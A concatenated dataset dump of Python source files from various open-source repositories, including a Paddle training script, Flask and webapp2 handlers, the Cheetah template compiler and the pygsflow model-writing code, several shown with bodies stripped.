] | null | null | null | train.py | zpc-666/Paddle-Stochastic-Depth-ResNet110 | bb8b5b90052feef39fafd2a790f08b80b45fbe41 | [
"Apache-2.0"
] | 1 | 2021-08-07T14:56:44.000Z | 2021-08-07T14:56:44.000Z | # coding: utf-8
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import paddle
import paddle.nn as nn
import importlib
from visualdl import LogWriter
import numpy as np
import pickle
from models import utils
from config import parser_args
if __name__ == '__main__':
args = parser_args()
utils.seed_paddle(args.seed)
if not args.high_level_api:
train_model(args)
else:
train_hl_api(args) | 47.899281 | 169 | 0.615801 |
466669f55fd94ab7691c895cf787adfe7eec635c | 1,204 | py | Python | dataloader/EDSR/video.py | pidan1231239/SR-Stereo2 | 8e7ef8f33a10c9d857cc5383c02d126ee6ab8a29 | [
"MIT"
] | 1 | 2020-03-11T12:19:13.000Z | 2020-03-11T12:19:13.000Z | dataloader/EDSR/video.py | pidan1231239/SR-Stereo2 | 8e7ef8f33a10c9d857cc5383c02d126ee6ab8a29 | [
"MIT"
] | null | null | null | dataloader/EDSR/video.py | pidan1231239/SR-Stereo2 | 8e7ef8f33a10c9d857cc5383c02d126ee6ab8a29 | [
"MIT"
] | null | null | null | import os
from . import common
import cv2
import numpy as np
import imageio
import torch
import torch.utils.data as data
| 26.755556 | 77 | 0.623754 |
46674d12a75c726caab7f069ff51c1295884c1f4 | 67 | py | Python | backend/views/__init__.py | chriamue/flask-unchained-react-spa | 610e099f3ece508f4c8a62d3704e4cc49f869194 | [
"MIT"
] | 5 | 2018-10-15T15:33:32.000Z | 2021-01-13T23:03:48.000Z | backend/views/__init__.py | chriamue/flask-unchained-react-spa | 610e099f3ece508f4c8a62d3704e4cc49f869194 | [
"MIT"
] | 18 | 2019-12-10T22:11:27.000Z | 2021-12-13T20:42:58.000Z | backend/views/__init__.py | chriamue/flask-unchained-react-spa | 610e099f3ece508f4c8a62d3704e4cc49f869194 | [
"MIT"
] | 4 | 2018-10-15T15:59:25.000Z | 2020-04-11T17:48:35.000Z | from .contact_submission_resource import ContactSubmissionResource
| 33.5 | 66 | 0.925373 |
4667ccf5ef5c78e64a0eadc56411d4151f24e864 | 6,395 | py | Python | blink_handler.py | oyiptong/chromium-dashboard | c94632a779da0c8ab51c2e029fdcceffad6ab4c1 | [
"Apache-2.0"
] | null | null | null | blink_handler.py | oyiptong/chromium-dashboard | c94632a779da0c8ab51c2e029fdcceffad6ab4c1 | [
"Apache-2.0"
] | null | null | null | blink_handler.py | oyiptong/chromium-dashboard | c94632a779da0c8ab51c2e029fdcceffad6ab4c1 | [
"Apache-2.0"
] | 1 | 2020-09-29T19:23:59.000Z | 2020-09-29T19:23:59.000Z | # -*- coding: utf-8 -*-
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = 'ericbidelman@chromium.org (Eric Bidelman)'
import collections
import json
import logging
import os
import webapp2
import yaml
# Appengine imports.
from google.appengine.api import memcache
import common
import models
import settings
import util
from schedule import construct_chrome_channels_details
# Add user to component subscribers.
def post(self, path):
params = json.loads(self.request.body)
self.__update_subscribers_list(True, user_id=params.get('userId'),
blink_component=params.get('componentName'),
primary=params.get('primary'))
# memcache.flush_all()
# memcache.delete('%s|blinkcomponentowners' % (settings.MEMCACHE_KEY_PREFIX))
self.response.set_status(200, message='User added to subscribers')
return self.response.write(json.dumps(params))
class SubscribersHandler(common.ContentHandler):
app = webapp2.WSGIApplication([
('/admin/blink/populate_subscribers', PopulateSubscribersHandler),
('/admin/subscribers(.*)', SubscribersHandler),
('(.*)', BlinkHandler),
], debug=settings.DEBUG)
| 34.945355 | 124 | 0.70086 |
46687db58d5ce22cf64d16f65406c0bb8f14b56a | 2,756 | py | Python | OBlog/blueprint/pages/main.py | OhYee/OBlog | a9d7e4fda5651cf9c5afd4c128c4df4442794e97 | [
"BSD-3-Clause"
] | 23 | 2018-02-23T12:56:43.000Z | 2021-12-20T13:21:47.000Z | OBlog/blueprint/pages/main.py | OhYee/OBlog | a9d7e4fda5651cf9c5afd4c128c4df4442794e97 | [
"BSD-3-Clause"
] | 17 | 2018-02-23T12:52:39.000Z | 2018-12-04T05:50:58.000Z | OBlog/blueprint/pages/main.py | OhYee/OBlog | a9d7e4fda5651cf9c5afd4c128c4df4442794e97 | [
"BSD-3-Clause"
] | 2 | 2018-06-16T20:52:23.000Z | 2021-04-08T15:29:44.000Z | from OBlog import database as db
from flask import g, current_app
import re
import os
| 22.590164 | 96 | 0.576197 |
4669e171fec58193272f58bd7b305ba7d5f7aed0 | 78,232 | py | Python | lib/rabbitmq-dotnet-client-rabbitmq_v3_4_4/docs/pyle2-fcfcf7e/Cheetah/Compiler.py | CymaticLabs/Unity3d.Amqp | 42ca5de66fcda21ef6a4040bade99118b2ad6374 | [
"MIT"
] | 83 | 2017-03-15T12:43:25.000Z | 2022-03-31T12:38:44.000Z | lib/rabbitmq-dotnet-client-rabbitmq_v3_4_4/docs/pyle2-fcfcf7e/Cheetah/Compiler.py | CymaticLabs/Unity3d.Amqp | 42ca5de66fcda21ef6a4040bade99118b2ad6374 | [
"MIT"
] | 18 | 2017-03-20T14:12:58.000Z | 2021-07-28T09:11:55.000Z | lib/rabbitmq-dotnet-client-rabbitmq_v3_4_4/docs/pyle2-fcfcf7e/Cheetah/Compiler.py | CymaticLabs/Unity3d.Amqp | 42ca5de66fcda21ef6a4040bade99118b2ad6374 | [
"MIT"
] | 25 | 2017-04-01T01:40:02.000Z | 2022-02-20T11:08:12.000Z | #!/usr/bin/env python
# $Id: Compiler.py,v 1.148 2006/06/22 00:18:22 tavis_rudd Exp $
"""Compiler classes for Cheetah:
ModuleCompiler aka 'Compiler'
ClassCompiler
MethodCompiler
If you are trying to grok this code start with ModuleCompiler.__init__,
ModuleCompiler.compile, and ModuleCompiler.__getattr__.
Meta-Data
================================================================================
Author: Tavis Rudd <tavis@damnsimple.com>
Version: $Revision: 1.148 $
Start Date: 2001/09/19
Last Revision Date: $Date: 2006/06/22 00:18:22 $
"""
__author__ = "Tavis Rudd <tavis@damnsimple.com>"
__revision__ = "$Revision: 1.148 $"[11:-2]
import sys
import os
import os.path
from os.path import getmtime, exists
import re
import types
import time
import random
import warnings
import __builtin__
import copy
from Cheetah.Version import Version, VersionTuple
from Cheetah.SettingsManager import SettingsManager
from Cheetah.Parser import Parser, ParseError, specialVarRE, \
STATIC_CACHE, REFRESH_CACHE, SET_LOCAL, SET_GLOBAL,SET_MODULE
from Cheetah.Utils.Indenter import indentize # an undocumented preprocessor
from Cheetah import ErrorCatchers
from Cheetah import NameMapper
from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList
VFFSL=valueFromFrameOrSearchList
VFSL=valueFromSearchList
VFN=valueForName
currentTime=time.time
DEFAULT_COMPILER_SETTINGS = {
## controlling the handling of Cheetah $placeholders
'useNameMapper': True, # Unified dotted notation and the searchList
'useSearchList': True, # if false, assume the first
# portion of the $variable (before the first dot) is a global,
# builtin, or local var that doesn't need
# looking up in the searchlist BUT use
# namemapper on the rest of the lookup
'allowSearchListAsMethArg': True,
'useAutocalling': True, # detect and call callable()'s, requires NameMapper
'useStackFrames': True, # use NameMapper.valueFromFrameOrSearchList
# rather than NameMapper.valueFromSearchList
'useErrorCatcher':False,
'alwaysFilterNone':True, # filter out None, before the filter is called
'useFilters':True, # use str instead if =False
'includeRawExprInFilterArgs':True,
#'lookForTransactionAttr':False,
'autoAssignDummyTransactionToSelf':False,
'useKWsDictArgForPassingTrans':True,
## controlling the aesthetic appearance / behaviour of generated code
'commentOffset': 1,
# should shorter str constant chunks be printed using repr rather than ''' quotes
'reprShortStrConstants': True,
'reprNewlineThreshold':3,
'outputRowColComments':True,
# should #block's be wrapped in a comment in the template's output
'includeBlockMarkers': False,
'blockMarkerStart':('\n<!-- START BLOCK: ',' -->\n'),
'blockMarkerEnd':('\n<!-- END BLOCK: ',' -->\n'),
'defDocStrMsg':'Autogenerated by CHEETAH: The Python-Powered Template Engine',
'setup__str__method': False,
'mainMethodName':'respond',
'mainMethodNameForSubclasses':'writeBody',
'indentationStep': ' '*4,
'initialMethIndentLevel': 2,
'monitorSrcFile':False,
'outputMethodsBeforeAttributes': True,
## customizing the #extends directive
'autoImportForExtendsDirective':True,
'handlerForExtendsDirective':None, # baseClassName = handler(compiler, baseClassName)
# a callback hook for customizing the
# #extends directive. It can manipulate
# the compiler's state if needed.
# also see allowExpressionsInExtendsDirective
# input filtering/restriction
# use lower case keys here!!
'disabledDirectives':[], # list of directive keys, without the start token
'enabledDirectives':[], # list of directive keys, without the start token
'disabledDirectiveHooks':[], # callable(parser, directiveKey)
'preparseDirectiveHooks':[], # callable(parser, directiveKey)
'postparseDirectiveHooks':[], # callable(parser, directiveKey)
'preparsePlaceholderHooks':[], # callable(parser)
'postparsePlaceholderHooks':[], # callable(parser)
# the above hooks don't need to return anything
'expressionFilterHooks':[], # callable(parser, expr, exprType, rawExpr=None, startPos=None)
# exprType is the name of the directive, 'psp', or 'placeholder'. all
# lowercase. The filters *must* return the expr or raise an exception.
# They can modify the expr if needed.
'templateMetaclass':None, # strictly optional. Only works with new-style baseclasses
'i18NFunctionName':'self.i18n',
## These are used in the parser, but I've put them here for the time being to
## facilitate separating the parser and compiler:
'cheetahVarStartToken':'$',
'commentStartToken':'##',
'multiLineCommentStartToken':'#*',
'multiLineCommentEndToken':'*#',
'gobbleWhitespaceAroundMultiLineComments':True,
'directiveStartToken':'#',
'directiveEndToken':'#',
'allowWhitespaceAfterDirectiveStartToken':False,
'PSPStartToken':'<%',
'PSPEndToken':'%>',
'EOLSlurpToken':'#',
'gettextTokens': ["_", "N_", "ngettext"],
'allowExpressionsInExtendsDirective': False, # the default restricts it to
# accepting dotted names
'allowEmptySingleLineMethods': False,
'allowNestedDefScopes': True,
'allowPlaceholderFilterArgs': True,
## See Parser.initDirectives() for the use of the next 3
#'directiveNamesAndParsers':{}
#'endDirectiveNamesAndHandlers':{}
#'macroDirectives':{}
}
##################################################
## METHOD COMPILERS
##################################################
## CLASS COMPILERS
_initMethod_initCheetah = """\
if not self._CHEETAH__instanceInitialized:
cheetahKWArgs = {}
allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()
for k,v in KWs.items():
if k in allowedKWs: cheetahKWArgs[k] = v
self._initCheetahInstance(**cheetahKWArgs)
""".replace('\n','\n'+' '*8)
##################################################
## MODULE COMPILERS
##################################################
## Make Compiler an alias for ModuleCompiler
Compiler = ModuleCompiler
| 39.631206 | 117 | 0.585323 |
466a34ecb0421da1e44f26b4a2ebb96b4fc1273b | 1,267 | py | Python | tests/simple_cmd_checks.py | Rhoynar/plmn-regression | fa58819a405b45430bbde28e52b356e04867aaa3 | [
"MIT"
] | 11 | 2019-02-07T16:13:59.000Z | 2021-08-14T03:53:14.000Z | tests/simple_cmd_checks.py | Rhoynar/plmn-regression | fa58819a405b45430bbde28e52b356e04867aaa3 | [
"MIT"
] | null | null | null | tests/simple_cmd_checks.py | Rhoynar/plmn-regression | fa58819a405b45430bbde28e52b356e04867aaa3 | [
"MIT"
] | 3 | 2019-02-07T16:14:09.000Z | 2021-08-14T05:09:17.000Z | # -*- coding: utf-8 -*-
import compat
import unittest
import sys
from plmn.utils import *
from plmn.results import *
from plmn.modem_cmds import *
from plmn.simple_cmds import *
if __name__ == '__main__':
nargs = process_args()
unittest.main(argv=sys.argv[nargs:], exit=False)
Results.print_results()
| 31.675 | 89 | 0.750592 |
466a6d9821a84e031f7dcd282011c9bf05adc133 | 13,877 | py | Python | mogan/tests/unit/notifications/test_notification.py | GURUIFENG9139/rocky-mogan | 6008c1d12b00e70d2cc651f7bd5d47968fc3aec7 | [
"Apache-2.0"
] | null | null | null | mogan/tests/unit/notifications/test_notification.py | GURUIFENG9139/rocky-mogan | 6008c1d12b00e70d2cc651f7bd5d47968fc3aec7 | [
"Apache-2.0"
] | null | null | null | mogan/tests/unit/notifications/test_notification.py | GURUIFENG9139/rocky-mogan | 6008c1d12b00e70d2cc651f7bd5d47968fc3aec7 | [
"Apache-2.0"
] | null | null | null | # All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import mock
from oslo_versionedobjects import fixture as object_fixture
from mogan.notifications import base as notification_base
from mogan.notifications.objects import base as notification
from mogan.objects import base
from mogan.objects import fields
from mogan.objects import server as server_obj
from mogan.tests import base as test_base
from mogan.tests.unit.db import utils as db_utils
notification_object_data = {
'ServerPayload': '1.0-30fefa8478f1b9b35c66868377fb6dfd',
'ServerAddressesPayload': '1.0-69caf4c36f36756bb1f6970d093ee1f6',
'ServerActionPayload': '1.0-8dc4429afa34d86ab92c9387e3ccd0c3',
'ServerActionNotification': '1.0-20087e599436bd9db62ae1fb5e2dfef2',
'ExceptionPayload': '1.0-7c31986d8d78bed910c324965c431e18',
'EventType': '1.0-589894aac7c98fb640eca394f67ad621',
'NotificationPublisher': '1.0-4b0b0d662b21eeed0b23617f3f11794b'
}
| 41.423881 | 79 | 0.64906 |
466b2847bd0a3e11bd815c4ef8485277011347fd | 1,208 | py | Python | plash/macros/packagemanagers.py | 0xflotus/plash | 9dd66a06413d5c1f12fd9a7e7b56a05b797ad309 | [
"MIT"
] | null | null | null | plash/macros/packagemanagers.py | 0xflotus/plash | 9dd66a06413d5c1f12fd9a7e7b56a05b797ad309 | [
"MIT"
] | null | null | null | plash/macros/packagemanagers.py | 0xflotus/plash | 9dd66a06413d5c1f12fd9a7e7b56a05b797ad309 | [
"MIT"
] | null | null | null | from plash.eval import eval, register_macro, shell_escape_args
eval([[
'defpm',
'apt',
'apt-get update',
'apt-get install -y {}',
], [
'defpm',
'add-apt-repository',
'apt-get install software-properties-common',
'run add-apt-repository -y {}',
], [
'defpm',
'apk',
'apk update',
'apk add {}',
], [
'defpm',
'yum',
'yum install -y {}',
], [
'defpm',
'dnf',
'dnf install -y {}',
], [
'defpm',
'pip',
'pip install {}',
], [
'defpm',
'pip3',
'pip3 install {}',
], [
'defpm',
'npm',
'npm install -g {}',
], [
'defpm',
'pacman',
'pacman -Sy --noconfirm {}',
], [
'defpm',
'emerge',
'emerge {}',
]])
| 18.875 | 69 | 0.537252 |
466ccc900104e36f636478253e917a965c1df4d3 | 371 | py | Python | app/schemas/email.py | waynesun09/notify-service | 768a0db264a9e57eecce283108878e24e8d3b740 | [
"MIT"
] | 5 | 2020-12-20T17:10:46.000Z | 2021-08-20T05:00:58.000Z | app/schemas/email.py | RedHatQE/notify-service | 579e995fae0c472f9fbd27471371a2c404d94f66 | [
"MIT"
] | 13 | 2021-01-07T14:17:14.000Z | 2022-01-05T20:36:36.000Z | app/schemas/email.py | RedHatQE/notify-service | 579e995fae0c472f9fbd27471371a2c404d94f66 | [
"MIT"
] | 1 | 2022-01-06T22:21:09.000Z | 2022-01-06T22:21:09.000Z | from typing import Optional, List
from pydantic import BaseModel, EmailStr
from . import result
| 18.55 | 40 | 0.719677 |
466d26384d26ffba4886645e21f0b784ab726d0b | 470 | py | Python | example.py | ErikPel/rankedchoicevoting | 7ea9149d2d7f48d5b4c323537a701b7ccf8a8616 | [
"MIT"
] | 1 | 2021-11-25T07:50:10.000Z | 2021-11-25T07:50:10.000Z | example.py | ErikPel/rankedchoicevoting | 7ea9149d2d7f48d5b4c323537a701b7ccf8a8616 | [
"MIT"
] | null | null | null | example.py | ErikPel/rankedchoicevoting | 7ea9149d2d7f48d5b4c323537a701b7ccf8a8616 | [
"MIT"
] | null | null | null | from rankedchoicevoting import Poll
candidatesA = {"Bob": 0, "Sue": 0, "Bill": 0}
#votes in array sorted by first choice to last choice
votersA = {
"a": ['Bob', 'Bill', 'Sue'],
"b": ['Sue', 'Bob', 'Bill'],
"c": ['Bill', 'Sue', 'Bob'],
"d": ['Bob', 'Bill', 'Sue'],
"f": ['Sue', 'Bob', 'Bill']
}
election = Poll(candidatesA,votersA)
election.addCandidate("Joe", 0)
election.addVoter("g",['Joe','Bob'])
print("Winner: " + election.getPollResults())
| 24.736842 | 53 | 0.576596 |
466d4b83456bbb93d38bc63179c0f99d00a30a62 | 2,422 | py | Python | DeployScript.py | junoteam/TelegramBot | 3e679637a5918c4f9595beaa2f0f67c9e4467056 | [
"Apache-2.0"
] | 3 | 2015-04-08T18:41:02.000Z | 2015-10-28T09:54:47.000Z | DeployScript.py | junoteam/TelegramBot | 3e679637a5918c4f9595beaa2f0f67c9e4467056 | [
"Apache-2.0"
] | null | null | null | DeployScript.py | junoteam/TelegramBot | 3e679637a5918c4f9595beaa2f0f67c9e4467056 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: Alex -*-
from Centos6_Bit64 import *
from SystemUtils import *
# Checking version of OS should happened before menu appears
# Check version of CentOS
SystemUtils.check_centos_version()
# Clear screen before to show menu
os.system('clear')
answer = True
while answer:
print ("""
LAMP Deploy Script V: 0.1 for CentOS 6.5/6.6 64Bit:
---------------------------------------------------
1. Check version of your CentOS
2. Check Internet connection
3. Show me my local IP address
4. Open port 80 to Web
5. Show me my localhost name
------- LAMP for CentOS 6.x -----------
6. Install EPEL & IUS repository
7. Install Web Server - Apache
8. Install Database - MySQL
9. Install Language - PHP
10. Install LAMP in "One Click" - CentOS 6.x
11. Exit/Quit
""")
answer = input("Please make your choice: ")
if answer == 1:
os.system('clear')
print ('\nChecking version of the system: ')
SystemUtils.check_centos_version()
elif answer == 2:
os.system('clear')
print ('\nChecking if you connected to the Internet')
SystemUtils.check_internet_connection()
elif answer == 3:
os.system('clear')
print ('\nYour local IP address is: ' + SystemUtils.check_local_ip())
elif answer == 4:
os.system('clear')
print('\nChecking firewall')
Centos6Deploy.iptables_port()
elif answer == 5:
print "Checking local hostname..."
SystemUtils.check_host_name()
elif answer == 6:
print ('\nInstalling EPEL and IUS repository to the system...')
Centos6Deploy.add_repository()
elif answer == 7:
print ('\nInstalling Web Server Apache...')
Centos6Deploy.install_apache()
elif answer == 8:
print ('\nInstalling database MySQL...')
Centos6Deploy.install_mysql()
elif answer == 9:
print('\nInstalling PHP...')
Centos6Deploy.install_php()
elif answer == 10:
print ('Install LAMP in "One Click" - CentOS 6.x')
Centos6Deploy.iptables_port()
Centos6Deploy.add_repository()
Centos6Deploy.install_mysql()
Centos6Deploy.install_php()
elif answer == 11:
print("\nGoodbye...\n")
answer = None
else:
print ('\nNot valid Choice, Try Again')
answer = True | 31.051282 | 77 | 0.604872 |
466dad9d3b71c7956f19885bfc3e8b7004d94303 | 1,923 | py | Python | distributed/register/application.py | ADKosm/concurrency | e3bda762ec12d8988ffda060f8842ffda5526f2b | [
"MIT"
] | null | null | null | distributed/register/application.py | ADKosm/concurrency | e3bda762ec12d8988ffda060f8842ffda5526f2b | [
"MIT"
] | null | null | null | distributed/register/application.py | ADKosm/concurrency | e3bda762ec12d8988ffda060f8842ffda5526f2b | [
"MIT"
] | null | null | null | import asyncio
import os
import time
from dataclasses import dataclass
import requests_unixsocket
from aiohttp import ClientSession, web
replicas = replicas_discovery()
self_id = next(filter(lambda x: x.is_self, replicas)).replica_id
print(replicas, flush=True)
app = web.Application()
app.add_routes([web.get('/', index),
web.get('/hello', hello)])
web.run_app(app, host='0.0.0.0', port=8080)
| 28.279412 | 115 | 0.651586 |
466e8b57966faf4a0cc17febbe2a82c29fab5e61 | 802 | py | Python | setup.py | greenaddress/txjsonrpc | 272d44db43d36645ba981c6e7fa73e33c1fbb7d5 | [
"MIT"
] | null | null | null | setup.py | greenaddress/txjsonrpc | 272d44db43d36645ba981c6e7fa73e33c1fbb7d5 | [
"MIT"
] | 1 | 2019-10-16T14:00:25.000Z | 2019-11-11T16:23:20.000Z | setup.py | greenaddress/txjsonrpc | 272d44db43d36645ba981c6e7fa73e33c1fbb7d5 | [
"MIT"
] | 2 | 2017-05-15T06:03:27.000Z | 2019-07-21T09:04:24.000Z | from __future__ import absolute_import
from setuptools import setup
from txjsonrpc import meta
from txjsonrpc.util import dist
setup(
name=meta.display_name,
version=meta.version,
description=meta.description,
author=meta.author,
author_email=meta.author_email,
url=meta.url,
license=meta.license,
packages=dist.findPackages(meta.library_name),
long_description=dist.catReST(
"docs/PRELUDE.txt",
"README",
"docs/DEPENDENCIES.txt",
"docs/INSTALL.txt",
"docs/USAGE.txt",
"TODO",
"docs/HISTORY.txt",
stop_on_errors=True,
out=True),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Programming Language :: Python",
],
)
| 24.30303 | 50 | 0.63591 |
466e8e7393dfb5f6f03f625478a37ff5c418e4db | 28,135 | py | Python | gsflow/gsflow.py | pygsflow/pygsflow | 83860cd58078017a65e1633b1192469777f1ce15 | [
"CC0-1.0",
"BSD-3-Clause"
] | 17 | 2019-11-11T02:49:29.000Z | 2022-02-17T03:45:19.000Z | gsflow/gsflow.py | pygsflow/pygsflow | 83860cd58078017a65e1633b1192469777f1ce15 | [
"CC0-1.0",
"BSD-3-Clause"
] | 21 | 2019-07-10T21:45:11.000Z | 2022-02-22T17:57:20.000Z | gsflow/gsflow.py | pygsflow/pygsflow | 83860cd58078017a65e1633b1192469777f1ce15 | [
"CC0-1.0",
"BSD-3-Clause"
] | 8 | 2019-11-11T02:49:36.000Z | 2021-09-30T18:43:45.000Z | # -*- coding: utf-8 -*-
import os
from .control import ControlFile
from .prms import PrmsModel
from .utils import gsflow_io, GsConstant
from .prms import Helper
from .modflow import Modflow
from .modsim import Modsim
import flopy
import subprocess as sp
import platform
import warnings
warnings.simplefilter("always", PendingDeprecationWarning)
warnings.simplefilter("always", UserWarning)
def write_input(self, basename=None, workspace=None, write_only=None):
"""
Write input files for gsflow. Four cases are possible:
(1) if basename and workspace are None,then the exisiting files will be overwritten
(2) if basename is specified, only file names will be changes
(3) if only workspace is specified, only folder will be changed
(4) when both basename and workspace are specifed both files are changed
Parameters
----------
basename : str
project basename
workspace : str
model output directory
write_only: a list
['control', 'parameters', 'prms_data', 'mf', 'modsim']
Examples
--------
>>> gsf = gsflow.GsflowModel.load_from_file('gsflow.control')
>>> gsf.write_input(basename="new", workspace="../new_model")
"""
print("Writing the project files .....")
if workspace is not None:
workspace = os.path.abspath(workspace)
if (basename, workspace) == (None, None):
print("Warning: input files will be overwritten....")
self._write_all(write_only)
# only change the directory
elif basename is None and workspace is not None:
if not (os.path.isdir(workspace)):
os.mkdir(workspace)
fnn = os.path.basename(self.control.control_file)
self.control.model_dir = workspace
self.control.control_file = os.path.join(workspace, fnn)
self.control_file = os.path.join(workspace, fnn)
if self.prms is not None:
self.prms.control_file = self.control_file
# change parameters
new_param_file_list = []
for par_record in self.prms.parameters.parameters_list:
curr_file = os.path.basename(par_record.file_name)
curr_file = os.path.join(workspace, curr_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values("param_file", new_param_file_list)
# change datafile
curr_file = os.path.relpath(
os.path.join(workspace, self.prms.data.name),
self.control.model_dir,
)
self.prms.data.model_dir = workspace
self.control.set_values("data_file", [curr_file])
# change mf
if self.mf is not None:
self.mf.change_model_ws(workspace, reset_external=True)
mfnm = self.mf.name + ".nam"
self.control.set_values("modflow_name", [mfnm])
# update file names in control object
self._update_control_fnames(workspace, basename)
# write
if self.prms is not None:
self.prms.control = self.control
self._write_all(write_only)
# only change the basename
elif basename is not None and workspace is None:
cnt_file = basename + "_cont.control"
ws_ = os.path.dirname(self.control.control_file)
self.control.control_file = os.path.join(ws_, cnt_file)
self.control_file = os.path.join(ws_, cnt_file)
self.prms.control_file = self.control_file
# change parameters
flist = self.prms.parameters.parameter_files
new_param_file_list = []
for ifile, par_record in enumerate(
self.prms.parameters.parameters_list
):
file_index = flist.index(par_record.file_name)
par_file = basename + "_par_{}.params".format(file_index)
curr_dir = self.control.model_dir
curr_file = os.path.join(curr_dir, par_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values("param_file", new_param_file_list)
# change datafile
dfile = basename + "_dat.data"
curr_file = os.path.relpath(
os.path.join(self.prms.data.model_dir, dfile),
self.control.model_dir,
)
self.prms.data.name = dfile
self.control.set_values("data_file", [curr_file])
# change mf
if self.mf is not None:
curr_dir = self.mf.model_ws
self.mf._set_name(basename)
self._update_mf_basename(basename)
mfnm = self.mf.name + ".nam"
self.control.set_values("modflow_name", [mfnm])
# update file names in control object
self._update_control_fnames(workspace, basename)
self.prms.control = self.control
self._write_all(write_only)
# change both directory & basename
elif basename is not None and workspace is not None:
if not (os.path.isdir(workspace)):
os.mkdir(workspace)
cnt_file = basename + "_cont.control"
self.control.model_dir = workspace
self.control.control_file = os.path.join(workspace, cnt_file)
self.prms.control_file = self.control.control_file
self.control_file = self.control.control_file
# change parameters
# get param files list
flist = self.prms.parameters.parameter_files
new_param_file_list = []
for ifile, par_record in enumerate(
self.prms.parameters.parameters_list
):
file_index = flist.index(par_record.file_name)
par_file = basename + "_par_{}.params".format(file_index)
curr_file = os.path.join(workspace, par_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values("param_file", new_param_file_list)
# change datafile
dfile = basename + "_dat.data"
curr_file = os.path.relpath(
os.path.join(workspace, dfile), self.control.model_dir
)
self.prms.data.model_dir = workspace
self.prms.data.name = dfile
self.control.set_values("data_file", [curr_file])
# flatten mf
if self.mf is not None:
self.mf.change_model_ws(workspace)
self.mf._set_name(os.path.join(workspace, basename))
self._update_mf_basename(basename)
mfnm = basename + ".nam"
self.control.set_values(
"modflow_name",
[
os.path.relpath(
os.path.join(workspace, mfnm), self.control.model_dir
)
],
)
# update file names in control object
self._update_control_fnames(workspace, basename)
self.prms.control = self.control
self._write_all(write_only)
else:
raise NotImplementedError()
def _update_control_fnames(self, workspace, basename):
"""
Method to update control file names and paths
Parameters
----------
workspace : str
model output directory
basename : str
project basename
"""
if workspace is not None and basename is None:
self.control.model_dir = workspace
for rec_name in GsConstant.GSFLOW_FILES:
if rec_name in self.control.record_names:
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
va = os.path.join(workspace, os.path.basename(fil))
va = os.path.relpath(va, self.control.model_dir)
file_value.append(va)
self.control.set_values(rec_name, file_value)
else:
for rec_name in GsConstant.GSFLOW_FILES:
if rec_name in self.control.record_names:
if rec_name in ("modflow_name",):
continue
elif rec_name in (
"modflow_name",
"param_file",
"data_file",
):
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
ws, filvalue = os.path.split(fil)
if not ws:
pass
else:
filvalue = os.path.relpath(
fil, self.control.model_dir
)
file_value.append(filvalue)
self.control.set_values(rec_name, file_value)
else:
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
if workspace is None:
workspace = self.control.model_dir
vvfile = rec_name.split("_")
del vvfile[-1]
vvfile = "_".join(vvfile)
if "." in fil:
ext = fil.split(".")[-1]
else:
ext = "dat"
vvfile = basename + "_" + vvfile + "." + ext
filvalue = os.path.join(workspace, vvfile)
filvalue = os.path.relpath(
filvalue, self.control.model_dir
)
file_value.append(filvalue)
self.control.set_values(rec_name, file_value)
def _update_mf_basename(self, basename):
"""
Convience method to update modflow Basename
Parameters
----------
basename : str
basename of the Modflow object
"""
out_files_list = []
for ix, out_file in enumerate(self.mf.output_fnames):
if out_file.count(".") > 1:
ext = out_file.split(".")
del ext[0]
ext = ".".join(ext)
else:
ext = out_file.split(".")[-1]
new_outfn = "{}.{}".format(basename, ext)
out_files_list.append(new_outfn)
self.mf.output_fnames = out_files_list
def _write_all(self, write_only):
"""
Method to write input files
Parameters
----------
write_only : list
list of files to write accepts,
control, parameters, prms_data, mf, and modsim
"""
write_only_options = (
"control",
"parameters",
"prms_data",
"mf",
"modsim",
)
if write_only is not None:
if not isinstance(write_only, list):
raise ValueError("write_only agrgument must be a list")
# make write options case insensitive
write_only = [i.lower() for i in write_only]
for write_option in write_only:
if not (write_option in write_only_options):
raise ValueError(
"The option '{}' is not recognized...".format(
write_option
)
)
else:
write_only = ()
# write control
if len(write_only) == 0 or "control" in write_only:
print("Writing Control file ...")
self.control.write()
if self.prms is not None:
# self write parameters
if len(write_only) == 0 or "parameters" in write_only:
print("Writing Parameters files ...")
self.prms.parameters.write()
# write data
if len(write_only) == 0 or "prms_data" in write_only:
print("Writing Data file ...")
self.prms.data.write()
# write mf
if self.mf is not None:
if len(write_only) == 0 or "mf" in write_only:
print("Writing Modflow files...")
self.mf.write_input()
if self.modsim is not None:
if len(write_only) == 0 or "modsim" in write_only:
print("Writing MODSIM shapefile")
self.modsim.write_modsim_shapefile()
def run_model(self, model_ws=".", forgive=False, gsflow_exe=None):
"""
